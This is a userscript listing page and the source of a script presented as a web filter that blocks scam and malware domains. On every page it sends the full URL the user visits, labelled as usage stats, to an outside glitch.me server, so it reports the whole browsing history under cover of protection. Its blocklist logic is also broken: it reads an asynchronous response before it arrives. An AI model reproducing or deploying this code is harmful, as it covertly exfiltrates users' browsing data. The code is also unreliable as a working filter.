Web Filter (Spams and Scams Gone!) [27K Sites Blocked (And Still Updating!)]

Filter out bad urls, scams, malware, shock sites, etc.

Tính đến 24-06-2020. Xem phiên bản mới nhất.

You will need to install an extension such as Tampermonkey, Greasemonkey or Violentmonkey to install this script.

Bạn sẽ cần cài đặt một tiện ích mở rộng như Tampermonkey hoặc Violentmonkey để cài đặt kịch bản này.

You will need to install an extension such as Tampermonkey or Violentmonkey to install this script.

You will need to install an extension such as Tampermonkey or Userscripts to install this script.

You will need to install an extension such as Tampermonkey to install this script.

You will need to install a user script manager extension to install this script.

(Tôi đã có Trình quản lý tập lệnh người dùng, hãy cài đặt nó!)

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

You will need to install an extension such as Stylus to install this style.

You will need to install a user style manager extension to install this style.

You will need to install a user style manager extension to install this style.

You will need to install a user style manager extension to install this style.

(I already have a user style manager, let me install it!)

// ==UserScript==
// @name         Web Filter (Spams and Scams Gone!) [27K Sites Blocked (And Still Updating!)]
// @namespace    https://greasyfork.org/en/users/198860-flarez-gaming
// @version      0.1
// @description  Filter out bad urls, scams, malware, shock sites, etc.
// @author       fz
// @include      *
// @grant        unsafeWindow
// @run-at       document-start
// ==/UserScript==

var xml;
var arr = ["https://cdn.glitch.com/94b7438a-e136-41db-80b8-a78ea1a6e027%2Fdomain%20list.txt?v=1592968773112"]; //cached blocklist from http://mirror1.malwaredomains.com/files/domains.txt
xml = new XMLHttpRequest(); xml.open("GET", arr[0], true); xml.send();
var resp = xml.responseText.split("\n");
resp.shift();resp.shift();resp.shift();resp.shift();
resp = resp.map((e)=>{return e.slice(2, (e).slice(2, -1).indexOf("	") + 2)});
//resp = resp.concat(["www.google.com"]); was for testing malicious domains

if (resp.includes(location.hostname)) {
    xml = new XMLHttpRequest();
    xml.open("POST", "https://ksw2-moomoo.glitch.me/", true);
    xml.setRequestHeader("Content-type", "application/json");
    xml.send(JSON.stringify({ //usage stats
        data: window.location.href + ";true",
        key: "wft"
    }));
    unsafeWindow.onbeforeunload = null;
    window.location = "https://blank.org";
} else {
    //if blocked
    setTimeout(()=>{
        xml = new XMLHttpRequest();
        xml.open("POST", "https://ksw2-moomoo.glitch.me/", true);
        xml.setRequestHeader("Content-type", "application/json");
        xml.send(JSON.stringify({ //usage stats
            data: window.location.href + ";false",
            key: "wft"
        }));
    }, 10000);
    //if not blocked
};